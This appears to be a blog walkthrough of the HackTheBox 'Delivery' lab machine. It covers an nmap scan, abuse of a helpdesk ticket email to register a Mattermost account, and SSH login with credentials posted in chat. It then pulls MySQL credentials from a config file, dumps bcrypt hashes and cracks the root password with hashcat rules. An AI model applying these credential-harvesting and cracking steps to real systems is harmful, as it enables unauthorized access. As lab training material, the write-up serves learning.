HackTheBox - Delivery
Morten Hansen • January 30, 2022
Delivery
mysql, grep, hashcat, rules, email
IP 10.10.10.222
NMAP
nmap -sC -sV 10.10.10.222 | tee NMAP/log
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 9c:40:fa:85:9b:01:ac:ac:0e:bc:0c:19:51:8a:ee:27 (RSA)
| 256 5a:0c:c0:3b:9b:76:55:2e:6e:c4:f4:b9:5d:76:17:09 (ECDSA)
|_ 256 b7:9d:f7:48:9d:a2:f2:76:30:fd:42:d3:35:3a:80:8c (ED25519)
80/tcp open http nginx 1.14.2
|_http-server-header: nginx/1.14.2
|_http-title: Welcome
BROWSER
found a website that contained link to http://helpdesk.delivery.htb/ and delivery.htb. Add this to /etc/hosts with 10.10.10.222 helpesk.delivery.htb delivery.htb.
Sent a ticket to helpdesk with user email test@test.com and name delivery. This gave a respose of:
delivery,
You may check the status of your ticket, by navigating to the Check Status page using ticket id: 8424164.
If you want to add more information to your ticket, just email 8424164@delivery.htb.
Thanks,
Support Team
Tried to log in with the credentials above and it worked.
Then went to http://delivery.htb:8065/signup_email and registered with 8424164@delivery.htb as email, and username delivery and password Delivery1!.
Then went back to helpdesk and read the mail that was sent. Then copied the verifying link for the mattermost user. After that I could log in at mattermost. Got redirected to http://delivery.htb:8065/internal/channels/town-square.
At the frontsite it says maildeliverer:Youve_G0t_Mail! wich works as credentials at osTicket with address http://helpdesk.delivery.htb/scp/index.php. Iside we can see it is version osTicket (v1.15.1).
Admins email maildeliverer@delivery.htb.
Try to log in with maildeliverer at ssh ssh maildeliverer@10.10.10.222 and password Youve_G0t_Mail!. We got shell as user.
User/Root GREP-tip
grep -B x # x linjer Before
grep -A x # x linjer After
grep -C x # x linjer Before and After
maildeliverer@Delivery:/opt/mattermost/config$ cat config.json | grep mysql -A 12
"DriverName": "mysql",
"DataSource": "mmuser:Crack_The_MM_Admin_PW@tcp(127.0.0.1:3306)/mattermost?charset=utf8mb4,utf8\u0026readTimeout=30s\u0026writeTimeout=30s",
"DataSourceReplicas": [],
"DataSourceSearchReplicas": [],
"MaxIdleConns": 20,
"ConnMaxLifetimeMilliseconds": 3600000,
"MaxOpenConns": 300,
"Trace": false,
"AtRestEncryptKey": "n5uax3d4f919obtsp1pw1k5xetq1enez",
"QueryTimeout": 30,
"DisableDatabaseSearch": false
},
"LogSettings": {
mysql -u mmuser --password="Crack_The_MM_Admin_PW"
use mattermost;
select Username, Password from Users;
Gives us
| Username | Password |
|---|---|
| surveybot | |
| c3ecacacc7b94f909d04dbfd308a9b93 | $2a$10$u5815SIBe2Fq1FZlv9S8I.VjU3zeSPBrIEg9wvpiLaS7ImuiItEiK |
| 5b785171bfb34762a933e127630c4860 | $2a$10$3m0quqyvCE8Z/R1gFcCOWO6tEj6FtqtBn8fRAXQXmaKmg.HDGpS/G |
| delivery | $2a$10$Q0j4Zq7K7Q7vCr1KJ806yeWvQ85EpgIC47WHq.okyYnPmOcdleJ0. |
| root | $2a$10$VM6EeymRxJ29r8Wjkr8Dtev0O.1STWb4.4ScG.anuu7v0EFJwgjjO |
| ff0a21fc6fc2488195e16ea854c963ee | $2a$10$RnJsISTLc9W3iUcUggl1KOG9vqADED24CQcQ8zvUm1Ir9pxS.Pduq |
| channelexport | |
| 9ecfb4be145d47fda0724f697f35ffaf | $2a$10$s.cLPSjAVgawGOJwB7vrqenPg2lrDtOECRtjwWahOzHfq1CoFyFqm |
Crack it with hashcat, we know from the internal website at mattermost that
@developers Please update theme to the OSTicket before we go live. Credentials to the server are maildeliverer:Youve_G0t_Mail!
Also please create a program to help us stop re-using the same passwords everywhere.... Especially those that are a variant of "PleaseSubscribe!"
So we create a wordlist with pleasesubscribe and crack it with hashcat rules. hashcat -a 0 -m 3200 hash wordlist -r /usr/share/hashcat/rules/best64.rule.
Password PleaseSubscribe!21.
Then we su root with our password, and get a root shell!
